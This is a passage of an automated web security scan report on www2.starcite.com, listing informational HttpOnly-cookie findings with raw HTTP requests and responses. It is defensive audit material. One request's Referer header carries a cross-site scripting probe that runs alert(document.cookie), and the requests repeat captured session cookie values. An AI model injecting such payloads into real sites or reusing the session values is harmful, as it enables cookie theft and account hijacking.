Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=35
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:35:22 GMT;path=/
Content-Length: 17925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...

2.76. http://www2.starcite.com/starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:08 GMT;path=/
Content-Length: 19158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...

2.77. http://www2.starcite.com/starcite/newsletters/november2010/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsletters/november2010/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/newsletters/november2010/index.html HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:17 GMT
Server: Apache
Last-Modified: Tue, 30 Nov 2010 18:09:18 GMT
ETag: "1000000003407-656c-496491657ae22"
Accept-Ranges: bytes
Content-Length: 25964
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:43 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.78. http://www2.starcite.com/starcite/node/100

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/100

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/node/100 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=41
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:48 GMT;path=/
Content-Length: 13694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.79. http://www2.starcite.com/starcite/node/335/445

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/335/445

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/node/335/445 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:30 GMT;path=/
Content-Length: 15012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.80. http://www2.starcite.com/starcite/node/929

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/929

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/node/929 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:44 GMT;path=/
Content-Length: 13741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.81. http://www2.starcite.com/starcite/planners/findtherightsolution

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/findtherightsolution

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/planners/findtherightsolution HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:55 GMT;path=/
Content-Length: 29497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta name="Desc
...[SNIP]...

2.82. http://www2.starcite.com/starcite/planners/howitworks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/howitworks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/planners/howitworks HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:13 GMT;path=/
Content-Length: 26501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.83. http://www2.starcite.com/starcite/planners/meetings1-1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/meetings1-1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/planners/meetings1-1 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:10 GMT;path=/
Content-Length: 17018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.84. http://www2.starcite.com/starcite/planners/requestmoreinformation

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/requestmoreinformation

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/planners/requestmoreinformation HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:00 GMT;path=/
Content-Length: 52367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.85. http://www2.starcite.com/starcite/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/privacy HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:15:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:37:40 GMT;path=/
Content-Length: 50747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.86. http://www2.starcite.com/starcite/resource/findresources

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resource/findresources

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/resource/findresources HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:59 GMT;path=/
Content-Length: 29216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.87. http://www2.starcite.com/starcite/resourcecenter/downloads/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/resourcecenter/downloads/a HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 14:26:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:26:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:50 GMT;path=/
Content-Length: 36918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.88. http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:20 GMT;path=/
Content-Length: 38834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.89. http://www2.starcite.com/starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:20 GMT;path=/
Content-Length: 39463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.90. http://www2.starcite.com/starcite/sitemap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/sitemap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/sitemap HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
